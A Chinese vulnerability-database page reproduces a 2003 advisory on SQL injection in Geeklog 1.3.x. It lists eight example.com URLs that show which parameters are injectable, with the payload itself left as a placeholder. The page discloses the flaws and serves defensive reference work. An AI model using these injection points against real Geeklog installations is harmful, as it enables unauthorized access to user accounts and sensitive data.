Geeklog 1.3.x – SQL Injection

15次阅读
没有评论

Geeklog 1.3.x – SQL Injection

漏洞ID 1054198 漏洞类型
发布时间 2003-09-29 更新时间 2003-09-29
Geeklog 1.3.x - SQL InjectionCVE编号 N/A
Geeklog 1.3.x - SQL InjectionCNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23193
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8718/info

Geeklog is prone to multiple vulnerabilities, including cross-site scripting and SQL injection issues. Exploitation of these issues could permit unauthorized access to user accounts and sensitive information.

Some of these issues may be related to previously documented vulnerabilities in Geeklog. 

http://www.example.com/index.php?topic=te'st/[SQL INJECTION CODE]

http://www.example.com/forum/viewtopic.php?forum=1&showtopic=1'0/[SQL INJECTION
CODE]

http://www.example.com/staticpages/index.php?page=test'test/[SQL INJECTION CODE]

http://www.example.com/filemgmt/visit.php?lid=1'1'0/[SQL INJECTION CODE]

http://www.example.com/filemgmt/viewcat.php?cid='6/[SQL INJECTION CODE]

http://www.example.com/comment.php?type=filemgmt&cid=filemgmt-1'70/[SQL INJECTION
CODE]

http://www.example.com/comment.php?mode=display&sid=filemgmt-XXX&title=[SQL
INJECTION CODE]

http://www.example.com/filemgmt/singlefile.php?lid=17'/0/[SQL INJECTION CODE]

相关推荐: HP-UX SharedX recserv程序服务决绝漏洞

HP-UX SharedX recserv程序服务决绝漏洞 漏洞ID 1207296 漏洞类型 未知 发布时间 1998-09-03 更新时间 1998-09-03 CVE编号 CVE-1999-0779 CNNVD-ID CNNVD-199809-007 漏…

正文完
 0